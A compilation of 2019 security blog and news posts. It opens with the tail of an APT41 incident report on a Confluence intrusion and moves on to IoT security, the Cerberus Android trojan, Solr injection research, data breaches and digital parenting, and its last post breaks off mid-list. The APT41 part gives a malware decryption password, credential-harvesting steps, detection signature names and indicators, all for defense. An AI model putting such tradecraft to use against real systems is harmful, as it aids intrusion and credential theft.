This specific command provided a password of “9839D7F1A0” to decrypt the contents of F64.data, and a switch of “-m”, indicating the attacker wanted to replicate the functionality of Mimikatz. With the correct password provided, c64.exe loaded the decrypted and decompressed shellcode into memory and harvested credentials.

Ultimately, the attacker was able to exploit a vulnerability, execute code, and download custom malware on the vulnerable Confluence system. While Mimikatz failed, via ACEHASH they were able to harvest a single credential from the system. However, as Managed Defense detected this activity rapidly via network signatures, this operation was neutralized before the attackers progressed any further.

Key Takeaways From This Incident

  • APT41 utilized multiple malware families to maintain access into this environment; impactful remediation requires full scoping of an incident.
  • For effective Managed Detection & Response services, having coverage of both Endpoint and Network is critical for detecting and responding to targeted attacks.
  • Attackers may weaponize vulnerabilities quickly after their release, especially if they are present within a targeted environment. Patching of critical vulnerabilities ASAP is crucial to deter active attackers.

Detecting the Techniques

FireEye detects this activity across our platform, including detection for certutil usage, HIGHNOON, and China Chopper.

Detection

Signature Name

China Chopper

FE_Webshell_JSP_CHOPPER_1

 

FE_Webshell_Java_CHOPPER_1

 

FE_Webshell_MSIL_CHOPPER_1

HIGHNOON.PASSIVE

FE_APT_Backdoor_Raw64_HIGHNOON_2

 

FE_APT_Backdoor_Win64_HIGHNOON_2

Certutil Downloader

CERTUTIL.EXE DOWNLOADER (UTILITY)

 

CERTUTIL.EXE DOWNLOADER A (UTILITY)

ACEHASH

FE_Trojan_AceHash

Indicators

Type

Indicator

MD5 Hash (if applicable)

File

test.jsp

84d6e4ba1f4268e50810dacc7bbc3935

File

64.dat

51e06382a88eb09639e1bc3565b444a6

File

Ins64.exe

e42555b218248d1a2ba92c1532ef6786

File

c64.exe

846cdb921841ac671c86350d494abf9c

File

F64.data

a919b4454679ef60b39c82bd686ed141

IP Address

67.229.97[.]229

N/A

Looking for more? Join us for a webcast on August 29, 2019 where we detail more of APT41’s activities. You can also find a direct link to the public APT41 report here.

Acknowledgements

Special thanks to Dan Perez, Andrew Thompson, Tyler Dean, Raymond Leong, and Willi Ballenthin for identification and reversing of the HIGHNOON.PASSIVE malware.

IoT Security in 2019: Things You Need to Know

In recent years, IoT has been on the rise, with billions of new devices getting connected each year. The increase in connectivity is happening throughout markets and business sectors, providing new functionalities and opportunities. As devices get connected, they also become unprecedently exposed to the threat of cyberattacks. While the IoT security industry is still shaping, the solution is not yet clear. In this article, we will review the latest must-know about IoT visibility & security and we will dive into new approaches to secure the IoT revolution.

IoT visibility & security in 2019:

1. IoT endpoint security vs network security

Securing IoT devices is a real challenge. IoT devices are highly diversified, with a wide variety of operating systems (real-time operating systems, Linux-based or bare-metal), communication protocols and architectures. On top of the high diversity, comes the issues of low resources and lack of industry standards and regulations. Most security solutions today focus on securing the network (discover network anomalies and achieve visibility into IoT devices that are active in the network), while the understanding that the devices themselves must be protected is now establishing. The fact that IoT devices can be easily exploited makes them a very good target for attackers, aiming to use the weak IoT device as an entry point to the entire enterprise network, without being caught. Besides that, it’s important to remember that network solutions are irrelevant for distributed IoT devices (i.e., home medical devices), that has no network to protect them.

Manufacturers of IoT devices are therefore key for a secure IoT environment and more and more organizations are willing to pay more for built-in security into their smart devices.

2. “Cryptography is typically bypassed, not penetratedShamir’s law

In recent years we see a lot of focus on IoT data integrity, which basically means encryption & authentication. Though very important by itself, it’s important to understand that encryption doesn’t mean full security. When focusing mainly on encryption & authentication, companies forget that the devices are still exposed to cybersecurity vulnerabilities that can be used to penetrate the device and receive access into the decrypted information, thus bypassing the authentication and encryption entirely. In other words, what’s known for years in the traditional cyber industry as Shamir’s law should  now make its way to the IoT security industry: “Cryptography is typically bypassed, not penetrated” and therefore companies must invest in securing their devices from cyber attacks and not just handle data integrity. To read more about that, please visit Sternum IoT Security two-part blog post.

3. 3rd party IoT vulnerabilities

One of the main issues in IoT security is the heavily reliance of IoT devices on third-party components for communication capabilities, cryptographic capabilities, the operating system itself etc. In fact, this reliance is so strong that it has reached a point where it’s unlikely to find an IoT device without third-party components within it. The fact that third-party libraries are commonly used across devices, combined with the difficulty to secure them, makes them a sweet spot for hackers to look for IoT vulnerabilities and exploit many IoT devices through such 3rd party component.

Vulnerability in third-party components is very dangerous. In many IoT devices, there is no separation and segmentation between processes and/or tasks, which means that even one vulnerability in a third-party library is compromising the entire device. This could lead to lethal results: attackers can leverage the third-party vulnerability to take control over the device and cause damage, steal information of perform a ransomware attack on the manufacturer.

it’s not only that third-party components are dangerous, but they are also extremely difficult to secure. Many third-party components are delivered in binary form, with no source code available. Even when the source code is available, it’s often hard to dive into it and asses the security level or vulnerabilities inside it. Either way, most developers use the open-source components as black-boxes. On top of that, static analysis tools and compiler security flags lack the ability to analyze and secure third-party components and most IoT security solutions cannot offer real-time protection into binary code.

VxWorks vulnerabilities

A recent example of such third party vulnerability that affects millions of devices can be found in the security bugs found in the VxWorks embedded operating system. These vulnerabilities exposed every manufacturer that used VxWorks operating system, even if security measures like penetration testing, static analysis, PKI and firmware analysis were taken.

To summarize, in order to provide strong and holistic IoT protection, you must handle and secure all parts of the device, including the third-party components. Sternum IoT security solutions focus on holistically securing IoT devices from within and therefore offers a unique capability of embedding security protection & visibility into the device from end-to-end. Sternum’s solution is also operating during real-time execution of the device and prevents all attack attempts at the exact point of exploitation, while immediately alerting about the attack and its origins, including from within third-party libraries.

4. Regulation is kicking in

In the past two years, we’re seeing a across industries effort to create regulations and standards for IoT security. We are expecting to see more of these efforts shaping into real regulations that will obligate manufacturers to comply with them.

A good and important example is the FDA premarket cybersecurity guidance that was published last year and is expected to become a formal guidance in 2020. The guidance includes different aspects of cybersecurity in medical devices (which is in many cases are essentially IoT devices) such as data integrity, Over-the-air updates, real-time protection, execution integrity, third-party liabilities and real-time monitoring of the devices.

Another example is the California Internet of Things cybersecurity law that states: Starting on January 1st, 2020, any manufacturer of a device that connects “directly or indirectly” to the internet must equip it with “reasonable” security features, designed to prevent unauthorized access, modification, or information disclosure.

We expect to see more states and countries forming regulations around IoT security since these devices lack of security may have a dramatic effect on industry, cities, and people’s lives. Top two regulations that are about to be released are the new EU Cybersecurity Act (based on ENISA and ETSI standards) and the NIST IoT and Cybersecurity framework.

The post IoT Security in 2019: Things You Need to Know appeared first on CyberDB.

Analytics 101

From today’s smart home applications to autonomous vehicles of the future, the efficiency of automated decision-making is becoming widely embraced. Sci-fi concepts such as “machine learning” and “artificial intelligence” have been realized; however, it is important to understand that these terms are not interchangeable but evolve in complexity and knowledge to drive better decisions.

Distinguishing Between Machine Learning, Deep Learning and Artificial Intelligence

Put simply, analytics is the scientific process of transforming data into insight for making better decisions. Within the world of cybersecurity, this definition can be expanded to mean the collection and interpretation of security event data from multiple sources, and in different formats for identifying threat characteristics.

Simple explanations for each are as follows:

  • Machine Learning: Automated analytics that learn over time, recognizing patterns in data.  Key for cybersecurity because of the volume and velocity of Big Data.
  • Deep Learning: Uses many layers of input and output nodes (similar to brain neurons), with the ability to learn.  Typically makes use of the automation of Machine Learning.
  • Artificial Intelligence: The most complex and intelligent analytical technology, as a self-learning system applying complex algorithms which mimic human-brain processes such as anticipation, decision making, reasoning, and problem solving.

Benefits of Analytics within Cybersecurity

Big Data, the term coined in October 1997, is ubiquitous in cybersecurity as the volume, velocity and veracity of threats continue to explode. Security teams are overwhelmed by the immense volume of intelligence they must sift through to protect their environments from cyber threats. Analytics expand the capabilities of humans by sifting through enormous quantities of data and presenting it as actionable intelligence.

While the technologies must be used strategically and can be applied differently depending upon the problem at hand, here are some scenarios where human-machine teaming of analysts and analytic technologies can make all the difference:

  • Identify hidden malware with Machine Learning: Machine Learning algorithms recognize patterns far more quickly than your average human. This pattern recognition can detect behaviors that cause security breaches, whether known or unknown, periodically “learning” to become smarter. Machine Learning can be descriptive, diagnostic, predictive, or prescriptive in its analytic assessments, but typically is diagnostic and/or predictive in nature.
  • Defend against new threats with Deep Learning: Complex and multi-dimensional, Deep Learning reflects similar multi-faceted security behaviors in its actual algorithms; if the situation is complex, the algorithm is likely to be complex. It can detect, protect, and correct old or new threats by learning what is reasonable within any environment and identifying outliers and unique relationships.  Deep Learning can be descriptive, diagnostic, predictive, and prescriptive as well.
  • Anticipate threats with Artificial Intelligence: Artificial Intelligence uses reason and logic to understand its ecosystem. Like a human brain, AI considers value judgements and outcomes in determining good or bad, right or wrong.  It utilizes a number of complex analytics, including Deep Learning and Natural Language Processing (NLP). While Machine Learning and Deep Learning can span descriptive to prescriptive analytics, AI is extremely good at the more mature analytics of predictive and prescriptive.

With any security solution, therefore, it is important to identify the use case and ask “what problem are you trying to solve” to select Machine Learning, Deep Learning, or Artificial Intelligence analytics.  In fact, sometimes a combination of these approaches is required, like many McAfee products including McAfee Investigator.  Human-machine teaming as well as a layered approach to security can further help to detect, protect, and correct the most simple or complex of breaches, providing a complete solution for customers’ needs.

The post Analytics 101 appeared first on McAfee Blogs.

Digital Parenting: How to Keep the Peace with Your Kids Online

Simply by downloading the right combination of apps, parents can now track their child’s location 24/7, monitor their same social conversations, and inject their thoughts into their lives in a split second. To a parent, that’s called safety. To kids, it’s considered maddening.

Kids are making it clear that parents armed with apps are overstepping their roles in many ways. And, parents, concerned about the risks online are making it clear they aren’t about to let their kids run wild.

I recently watched the relationship of a mother and her 16-year-old daughter fall apart over the course of a year. When the daughter got her driver’s license (along with her first boyfriend), the mother started tracking her daughter’s location with the Life360 app to ease her mind. However, the more she tracked, the more the confrontations escalated. Eventually, the daughter, feeling penned in, waged a full-blown rebellion that is still going strong.

There’s no perfect way to parent, especially in the digital space. There are, however, a few ways that might help us drive our digital lanes more efficiently and keep the peace. But first, we may need to curb (or ‘chill out on’ as my kids put it) some annoying behaviors we may have picked up along the way.

Here are just a few ways to keep the peace and avoid colliding with your kids online:

Interact with care on their social media. It’s not personal. It’s human nature. Kids (tweens and teens) don’t want to hang out with their parents in public — that especially applies online. They also usually aren’t too crazy about you connecting with their friends online. And tagging your tween or teen in photos? Yeah, that’s taboo. Tip: If you need to comment on a photo (be it positive or negative) do it in person or with a direct message, not under the floodlights of social media. This is simply respecting your child’s social boundaries. 

Ask before you share pictures. Most parents think posting pictures of their kids online is a simple expression of love or pride, but to kids, it can be extremely embarrassing, and even an invasion of privacy. Tip: Be discerning about how much you post about your kids online and what you post. Junior may not think a baby picture of him potty training is so cute. Go the extra step and ask your child’s permission before posting a photo of them.

Keep tracking and monitoring in check. Just because you have the means to monitor your kids 24/7 doesn’t mean you should. It’s wise to know where your child goes online (and off) but when that action slips into a preoccupation, it can wreck a relationship (it’s also exhausting). The fact that some kids make poor digital choices doesn’t mean your child will. If your fears about the online world and assumptions about your child’s behavior have led you to obsessively track their location, monitor their conversations, and hover online, it may be time to re-engineer your approach. Tip: Put the relationship with your child first. Invest as much time into talking to your kids and spending one-one time with them as you do tracking them. Put conversation before control so that you can parent from confidence, rather than fear.

Avoid interfering in conflicts. Kids will be bullied, meet people who don’t like them and go through tough situations. Keeping kids safe online can be done with wise, respectful monitoring. However, that monitoring can slip into lawnmower parenting (mowing over any obstacle that gets in a child’s path) as described in this viral essay. Tip: Don’t block your child’s path to becoming a capable adult. Unless there’s a serious issue to your child’s health and safety, try to stay out of his or her online conflicts. Keep it on your radar but let it play out. Allow your child to deal with peers, feel pain, and find solutions. 

As parents, we’re all trying to find the balance between allowing kids to have their space online and still keep them safe. Too much tracking can cause serious family strife while too little can be inattentive in light of the risks. Parenting today is a difficult road that’s always a work-in-progress so give yourself permission to keep learning and improving your process along the way

The post Digital Parenting: How to Keep the Peace with Your Kids Online appeared first on McAfee Blogs.

Maths and tech specialists need Hippocratic oath, says academic

Exclusive: Hannah Fry says ethical pledge needed in tech fields that will shape future

Mathematicians, computer engineers and scientists in related fields should take a Hippocratic oath to protect the public from powerful new technologies under development in laboratories and tech firms, a leading researcher has said.

The ethical pledge would commit scientists to think deeply about the possible applications of their work and compel them to pursue only those that, at the least, do no harm to society.

Despite being invisible, maths has a dramatic impact on our lives

Related: Google whistleblower launches project to keep tech ethical

Related: To fix the problem of deepfakes we must treat the cause, not the symptoms | Matt Beard

Continue reading...

Weekly Update 152

Weekly Update 152

I made it out of Vegas! That was a rather intense 8 days and if I'm honest, returning to the relative tranquillity of Oslo has been lovely (not to mention the massive uptick in coffee quality). But just as the US to Europe jet lag passes, it's time to head back to Aus for a bit and go through the whole cycle again. And just on that, I've found that diet makes a hell of a difference in coping with this sort of thing:

This week it's almost all about commercial CAs and their increasingly bizarre behaviour. It's disappointing to see disinformation and privacy violations from any organisations, but when it's from the ones literally controlling trust on the web it's especially concerning. Maybe once they're no longer able to promote EV in the way they have been that will change, but I have a feeling we've got a bunch more crap to endure yet. See what you think about all that in this week's update:

Weekly Update 152
Weekly Update 152
Weekly Update 152

References

  1. Reminder: If you're using the HIBP API to search for email addresses, get yourself onto V3 ASAP! (you've got 2 days until the old versions die)
  2. Chegg had 40M accounts breach with unsalted MD5 password hashes! (it was April last year, now it's searchable in HIBP)
  3. Extended Validation Certificates are (Really, Really) Dead (I've been saying it for ages, but both Chrome and Firefox have really nailed it now)
  4. DigiCert is rejecting the proposal to reduce maximum certificate lifespans (uh, except for that post a few years ago when they thought it was a good idea...)
  5. Sectigo leaked the personal info of a do-gooder which resulted in him receiving a threatening letter (there's all kinds of things gone wrong here)
  6. Big thanks to strongDM for sponsoring my blog over the last week! (see why Splunk's CISO says "strongDM enables you to see what happens, replay & analyze incidents. You can't get that anywhere else")

Key Ways to Make the Case for AppSec Budget

Security departments are juggling a multitude of security initiatives, and each is competing for a slice of one budget. How do you make the case that AppSec deserves a slice of that budget pie, or a bigger slice, or even to make the pie bigger? Here are a few key ways:

Find a compelling event

The most obvious compelling event, of course, is a breach, but there are other events that will compel executives to budget for application security. For instance, regulations could be a compelling event – if you have to comply with a security regulation (PCI, NY DFS cybersecurity regulations, etc.) or pay a fine, that’s an easy budget win. In addition, customers asking about the security of software could be a compelling event. IT buyers are increasingly asking about the security of software before purchasing. We recently conducted a survey of IT buyers with IDG, and 96 percent of respondents reported that they are more likely to consider doing business with a vendor or partner whose software has been independently verified as “secure.” Sales losing a deal because they couldn’t respond to a security audit would certainly be considered a compelling event.

Look to the future

A clear road map and plan for your AppSec program not only gives you more credibility, but also helps to “warm up” your investors to what you’re planning on doing in future years. Show the efficiencies and risk reduction your program will make in the future to highlight how upfront investment will lead to future results. For instance, an investment in developer training will make developers more self-sufficient and lessen the burden on security teams.

Benchmark

It can be powerful to illustrate where your organization’s security program sits relative to other organizations and your peers. If you're lagging, it’s a clear indication that further investment is needed. If you're leading, you can use that fact to prove your progress and make the case for more ambitious projects.

Veracode’s State of Software Security is a good benchmarking resource, as is the OpenSAMM framework. The State of Software Security report includes comparisons by industry, so you can point to the application security progress made by others within your own industry. In addition, OWASP’s Application Security Verification Standard (ASVS) can help organizations to classify applications into three different levels from low to high assurance. This helps firms to allocate security resources based on the software’s business importance or risk breach.

Know your audience

Speak the language of executives when making the case for more budget. For instance, telling the CFO, “we've reduced the number of SQL injections” won’t resonate. Rather than the number of SQL injections, talk about how the program will reduce the number of breaches by X percent, or how it will reduce the cost to fix vulnerabilities by X percent. Be mindful of your audience and frame your budgeting conversation accordingly.

Be visible and credible

The more credible you are, the better your chances of getting the budget you’re asking for. Clearly understand what you're going to do with the money, and how you're going to justify that spend. Prove that you understand how your organization works and that you will use the money effectively. Finally, tie application security to business priorities and initiatives, and be able to show a clear roadmap for your program.

In addition, be visible. It's important to promote success of your program. Present on the progress you’re making, run awareness sessions, or have visible dashboards.

Break down your budget (must, should, could)

You’ll have a range of priorities and things that you could be spending money on in your AppSec program. Give your budget stakeholder options. Start with what you must do – for instance, what you need to achieve for regulatory compliance. And then give them some wiggle room in the middle on projects that they should or could do. If you go in with a number in mind and don't get it, be ready to slice and dice your budget request.

Learn more

Get more details on these strategies and additional tips and advice on making the case for AppSec budget in our new guide, Building a Business Case for Expanding Your AppSec Program.

The Cerberus Banking Trojan: 3 Tips to Secure Your Financial Data

A new banking trojan has emerged and is going after users’ Android devices. Dubbed Cerberus, this remote access trojan allows a distant attacker to take over an infected Android device, giving the attacker the ability to conduct overlay attacks, gain SMS control, and harvest the victim’s contact list. What’s more, the author of the Cerberus malware has decided to rent out the banking trojan to other cybercriminals as a means to spread these attacks.

According to The Hacker News, the author claims that this malware was completely written from scratch and doesn’t reuse code from other existing banking trojans. Researchers who analyzed a sample of the Cerberus trojan found that it has a pretty common list of features including the ability to take screenshots, hijacking SMS messages, stealing contact lists, stealing account credentials, and more.

When an Android device becomes infected with the Cerberus trojan, the malware hides its icon from the application drawer. Then, it disguises itself as Flash Player Service to gain accessibility permission. If permission is granted, Cerberus will automatically register the compromised device to its command-and-control server, allowing the attacker to control the device remotely. To steal a victim’s credit card number or banking information, Cerberus launches remote screen overlay attacks. This type of attack displays an overlay on top of legitimate mobile banking apps and tricks users into entering their credentials onto a fake login screen. What’s more, Cerberus has already developed overlay attacks for a total of 30 unique targets and banking apps.

So, what can Android users do to secure their devices from the Cerberus banking trojan? Check out the following tips to help keep your financial data safe:

  • Be careful what you download.Cerberus malware relies on social engineering tactics to make its way onto a victim’s device. Therefore, think twice about what you download or even plug into your device.
  • Click with caution.Only click on links from trusted sources. If you receive an email or text message from an unknown sender asking you to click on a suspicious link, stay cautious and avoid interacting with the message altogether.
  • Use comprehensive security. Whether you’re using a mobile banking app on your phone or browsing the internet on your desktop, it’s important to safeguard all of your devices with an extra layer of security. Use robust security software like McAfee Total Protection so you can connect with confidence.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post The Cerberus Banking Trojan: 3 Tips to Secure Your Financial Data appeared first on McAfee Blogs.

How to Build Your 5G Preparedness Toolkit

5G has been nearly a decade in the making but has really dominated the mobile conversation in the last year or so. This isn’t surprising considering the potential benefits this new type of network will provide to organizations and users alike. However, just like with any new technological advancement, there are a lot of questions being asked and uncertainties being raised around accessibility, as well as cybersecurity. The introduction of this next-generation network could bring more avenues for potential cyberthreats, potentially increasing the likelihood of denial-of-service, or DDoS, attacks due to the sheer number of connected devices. However, as valid as these concerns may be, we may be getting a bit ahead of ourselves here. While 5G has gone from an idea to a reality in a short amount of time for a handful of cities, these advancements haven’t happened without a series of setbacks and speedbumps.

In April 2019, Verizon was the first to launch a next-generation network, with other cellular carriers following closely behind. While a technological milestone in and of itself, some 5G networks are only available in select cities, even limited to just specific parts of the city. Beyond the not-so widespread availability of 5G, internet speeds of the network have performed at a multitude of levels depending on the cellular carrier. Even if users are located in a 5G-enabled area, if they are without a 5G-enabled phone they will not be able to access all the benefits the network provides. These three factors – user location, network limitation of certain wireless carriers, and availability of 5G-enabled smartphones – must align for users to take full advantage of this exciting innovation.

While there is still a lot of uncertainty surrounding the future of 5G, as well as what cyberthreats may emerge as a result of its rollout, there are a few things users can do to prepare for the transition. To get your cybersecurity priorities in order, take a look at our 5G preparedness toolkit to ensure you’re prepared when the nationwide roll-out happens:

  • Follow the news. Since the announcement of a 5G enabled network, stories surrounding the network’s development and updates have been at the forefront of the technology conversation. Be sure to read up on all the latest to ensure you are well-informed to make decisions about whether 5G is something you want to be a part of now or in the future.
  • Do your research. With new 5G-enabled smartphones about to hit the market, ensure you pick the right one for you, as well as one that aligns with your cybersecurity priorities. The right decision for you might be to keep your 4G-enabled phone while the kinks and vulnerabilities of 5G get worked out. Just be sure that you are fully informed before making the switch and that all of your devices are protected.
  • Be sure to update your IoT devices factory settings. 5G will enable more and more IoT products to come online, and most of these connected products aren’t necessarily designed to be “security first.” A device may be vulnerable as soon as the box is opened, and many cybercriminals know how to get into vulnerable IoT devices via default settings. By changing the factory settings, you can instantly upgrade your device’s security and ensure your home network is secure.
  • Add an extra layer of security.As mentioned, with 5G creating more avenues for potential cyberthreats, it is a good idea to invest in comprehensive mobile security to apply to all of your devices to stay secure while on-the-go or at home.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post How to Build Your 5G Preparedness Toolkit appeared first on McAfee Blogs.

New Research: Lessons from Password Checkup in action



Back in February, we announced the Password Checkup extension for Chrome to help keep all your online accounts safe from hijacking. The extension displays a warning whenever you sign in to a site using one of over 4 billion usernames and passwords that Google knows to be unsafe due to a third-party data breach. Since our launch, over 650,000 people have participated in our early experiment. In the first month alone, we scanned 21 million usernames and passwords and flagged over 316,000 as unsafe---1.5% of sign-ins scanned by the extension.
Today, we are sharing our most recent lessons from the launch and announcing an updated set of features for the Password Checkup extension. Our full research study, available here, will be presented this week as part of the USENIX Security Symposium.

Which accounts are most at risk?

Hijackers routinely attempt to sign in to sites across the web with every credential exposed by a third-party breach. If you use strong, unique passwords for all your accounts, this risk disappears. Based on anonymous telemetry reported by the Password Checkup extension, we found that users reused breached, unsafe credentials for some of their most sensitive financial, government, and email accounts. This risk was even more prevalent on shopping sites (where users may save credit card details), news, and entertainment sites.

In fact, outside the most popular web sites, users are 2.5X more likely to reuse vulnerable passwords, putting their account at risk of hijacking.
Anonymous telemetry reported by Password Checkup extension shows that users most often reuse vulnerable passwords on shopping, news, and entertainment sites.


Helping users re-secure their unsafe passwords

Our research shows that users opt to reset 26% of the unsafe passwords flagged by the Password Checkup extension. Even better, 60% of new passwords are secure against guessing attacks—meaning it would take an attacker over a hundred million guesses before identifying the new password.
Improving the Password Checkup extension

Today, we are also releasing two new features for the Password Checkup extension. The first is a direct feedback mechanism where users can inform us about any issues that they are facing via a quick comment box. The second gives users even more control over their data. It allows users to opt-out of the anonymous telemetry that the extension reports, including the number of lookups that surface an unsafe credential, whether an alert leads to a password change, and the domain involved for improving site coverage. By design, the Password Checkup extension ensures that Google never learns your username or password, regardless of whether you enable telemetry, but we still want to provide this option if users would prefer not to share this information.


We're continuing to improve the Password Checkup extension and exploring ways to implement its technology into Google products. For help keeping all your online accounts safe from hijacking, you can install the Password Checkup extension here today.

Myki data release breached privacy laws and revealed travel histories, including of Victorian MP

Researchers able to identify MP Anthony Carbines’s travel history using tweets and Public Transport Victoria dataset

The three-year travel history of a Victorian politician was able to be identified after the state government released the supposedly “de-identified” data of more than 15m myki public transport users in a breach of privacy laws.

In July 2018, Public Transport Victoria (now the Department of Transport) released a dataset containing 1.8bn travel records for 15.1m myki public transport users for the period between June 2015 and June 2018.

Related: Major breach found in biometrics system used by banks, UK police and defence firms

See you about 05.24AM tomorrow at Rosanna to catch the first train to town. Well done all. Thanks for hanging in there. Massive construction effort. Single track gone. Two level crossings gone. The trains! The trains! The trains are coming! pic.twitter.com/kk2Cj3ey9T

Continue reading...

As Cyberattacks Increase, So Does the Price of Cybersecurity Professionals

Cyberattacks are on the rise, and companies are noticing. Everyone is in a scramble to avoid being the next corporation sweeping news headlines with the words “data breach” following. As a result, the demand for cybersecurity experts is skyrocketing, but there are a couple of problems. Not only are there not enough cybersecurity experts to fill those roles, but for the cybersecurity experts that are out there, they’re demanding a premium for their talents.

A recent Bloomberg article stated that in 2012, an enticing rate for a chief information security officer at a large company was $650,000. Fast forward to 2019, and the same role at the same company is going for $2.5 million. On top of that, the article points to data that shows there were more than 300,000 unfilled cybersecurity jobs over a 12-month period in the United States in 2017-2018. When looking to the future, Cybersecurity Ventures predicts that the amount of unfilled positions will grow to about 3.5 million jobs.

So, the problem itself is double-pronged. Companies are recognizing that they need to address cybersecurity in some way, shape, or form, and are looking to bring in experts to help them out – but those experts come at a very high cost.

Alternatives to the salary game

Security champions

Hiring additional security professionals does not have to be the starting point for your company to take the leap into more secure software. One practical way to embed security into your organization, and get more from your existing security team, is to look for – and create – security champions on your development teams. Step one is finding a security-minded individual on your development team, and then giving them extra training, responsibilities, and perks to incentivize them to be that security liaison. Developers will be much more inclined to take security advice from someone who’s already familiar with their lingo and processes.

Ultimately, with a security champion, an organization can make up for a lack of security coverage or skills by empowering a member of the development team to act as a force multiplier who can pass on security best practices, answer questions, and raise security awareness.

For more information on security champions, check out this Veracode guide.

Outside partners

As organizations struggle to find the right people to step in and oversee their programs, another effective way to ensure you have your bases covered is by bringing in an outside partner. Having a solution like that offers hands-on support, coaching for developers, and AppSec expertise can make a world of a difference. We aren’t suggesting you replace your internal team with outside consultants; rather, that you free your team to focus on managing risk by taking these tasks off of their plates:

  • Addressing the blocking and tackling of onboarding
  • Application security program management
  • Reporting Identifying and addressing barriers to success
  • Working with development teams to ensure they’re finding and remediating vulnerabilities

Learn more about the benefits of bringing in an outside partner in this blog.

Automation

While you try to find the balance between keeping your headcount low, yet covering all of your bases from a security standpoint, a fantastic way to tie your approach together lies within utilizing automated security solutions. You can remove the need for human intervention as much as possible, continue to enable your developers to test for flaws early and often, and integrate a solution that works in tandem with your current environment. Having the security champions, automated solutions that are easy to work with, and a partner who can help your developers out when they run into roadblocks are all effective ways to reduce your risk – and without breaking the bank.

Want to find out how Veracode can help you check off all of these boxes and more? Request a personalized demo of our platform today.

GRA Quantum Launches Comprehensive Security Services

​Global cybersecurity firm GRA Quantum announces the launch of its comprehensive offering, Scalable Security Suite, providing solutions based on a combination of Managed Security Services and professional services, tailored to the specific needs of each client. Scalable Security Suite was created to give small to mid-sized organizations a running start when it comes to security, providing the same standard of security controls as large enterprises.

According to GRA Quantum’s President Tom Boyden, “Small and medium-sized firms are prime targets for cybercrime, but many don’t have the necessary resources or guidance to properly strengthen their security stance.  Our Scalable Security Suite is designed to help these organizations prioritize their greatest vulnerabilities and provide them a security solution that aligns with their business needs and evolves as these needs and the threat landscapes change.”

Managed Security Services (MSS), launched in December 2018, is the foundation of Scalable Security Suite. Through comprehensive security assessments, GRA Quantum experts identify vulnerabilities and provide recommendations for a custom combination of professional service offerings to best address these vulnerabilities. Professional services can be added to Managed Security Services to overcome vulnerabilities and build a more comprehensive, proactive security program.

Jen Greulich, GRA Quantum’s Director of Managed Security Services, has seen the need arise among current MSS clients for these supplemental services.  “Oftentimes, it becomes clear in a scoping call that clients’ needs extend beyond what we offer through MSS. Our new flexible offering allows us to work with the clients to develop a custom security solution for them that compliments MSS — whether they need incident response or penetration testing services.”

Aligned with GRA Quantum’s mission, Scalable Security Suite goes beyond the ordinary cyber assessment to understand and remediate acute physical and human-centric vulnerabilities as well.

To learn more about Scalable Security Suite, visit us on our website or begin to build your cybersecurity strategy with The Complete Guide to Building a Cybersecurity Strategy from Scratch.

The post GRA Quantum Launches Comprehensive Security Services appeared first on GRA Quantum.

New Research: Apache Solr Parameter Injection

Apache Solr is an open source enterprise search platform, written in Java, from the Apache Lucene project. Its major features include full-text search, hit highlighting, faceted search, dynamic clustering, and document parsing. You treat it like a database: you run the server, create a collection, and send different types of data to it (such as text, XML documents, PDF documents, etc.). Solr automatically indexes this data and provides a fast but rich REST API interface to search it. The only protocol to talk to the server is HTTP, and yes, it's accessible without authentication by default, which makes it a perfect victim for keen hackers.

In a new research paper, Veracode Security Researcher Michael Stepankin sheds light on this new type of vulnerability for web applications – Solr parameter injection – and explains how cyberattackers can achieve remote code execution through it. Whether the Solr instance is Internet-facing, behind the reverse proxy, or used only by internal web applications, the ability to modify Solr research parameters is a significant security risk. Further, in cases where only a web application that uses Solr is accessible, by exploiting 'Solr (local) Parameters Injection,' it is possible to at least modify or view all the data within the Solr cluster, or even exploit known vulnerabilities to achieve remote code execution.

Read the in-depth, technical whitepaper, “Apache Solr Injection,” on GitHub.

Major breach found in biometrics system used by banks, UK police and defence firms

Fingerprints, facial recognition and other personal information from Biostar 2 discovered on publicly accessible database

The fingerprints of over 1 million people, as well as facial recognition information, unencrypted usernames and passwords, and personal information of employees, was discovered on a publicly accessible database for a company used by the likes of the UK Metropolitan police, defence contractors and banks.

Suprema is the security company responsible for the web-based Biostar 2 biometrics lock system that allows centralised control for access to secure facilities like warehouses or office buildings. Biostar 2 uses fingerprints and facial recognition as part of its means of identifying people attempting to gain access to buildings.

Related: The Great Hack: the film that goes behind the scenes of the Facebook data scandal

Related: Chinese cyberhackers 'blurring line between state power and crime'

Continue reading...

How To Help Your Kids Manage Our ‘Culture of Likes’

As a mum of 4 sons, my biggest concerns about the era of social media is the impact of the ‘like culture’ on our children’s mental health. The need to generate likes online has become a biological compulsion for many teens and let’s be honest – adults too! The rush of dopamine that surges through one’s body when a new like has been received can make this like culture understandably addictive.

 

Research Shows Likes Can Make You Feel As Good As Chocolate!

The reason why our offspring (and even us) just can’t give up social media is because it can make us feel just so damn good! In fact, the dopamine surges we get from the likes we collect can give us a true psychological high and create a reward loop that is almost impossible to break. Research published in Psychological Science, a journal of the Association for Psychological Science, shows the brain circuits that are activated by eating chocolate and winning money are also activated when teens see large numbers of ‘likes’ on their own photos or photos of peers in a social network.

Likes and Self Worth

Approval and validation by our peers has, unfortunately, always had an impact on our sense of self-worth. Before the era of social media, teens may have measured this approval by the number of invitations they received to parties or the number of cards they received on their birthday. But in the digital world of the 21st  century, this is measured very publicly through the number of followers we have or the number of likes we receive on our posts.

But this is dangerous territory. Living our lives purely for the approval of others is a perilous game. If our self-worth is reliant on the amount of likes we receive then we are living very fragile existences.

Instagram’s Big Move

In recognition of the competition social media has become for many, Instagram has decided to trial hiding the likes tally on posts. Instagram believes this move, which is also being trialled in six other countries including Canada and New Zealand, will improve the well-being of users and allow them to focus more on ‘telling their story’ and less on their likes tally.

But the move has been met with criticism. Some believe Instagram is ‘mollycoddling’ the more fragile members of our community whilst others believe it is threatening the livelihood of ‘Insta influencers’ whose income is reliant on public displays of likes.

Does Instagram’s Move Really Solve Address our Likes Culture?

While I applaud Instagram for taking a step to address the wellbeing and mental health of users, I believe that it won’t be long before users simply find another method of social validation to replace our likes stats. Whether it’s follower numbers or the amount of comments or shares, many of us have been wired to view social media platforms like Instagram as a digital popularity contest so will adjust accordingly. Preparing our kids for the harshness of this competitive digital environment needs to be a priority for all parents.

What Can Parents Do?

Before your child joins social media, it is imperative that you do your prep work with your child. There are several things that need to be discussed:

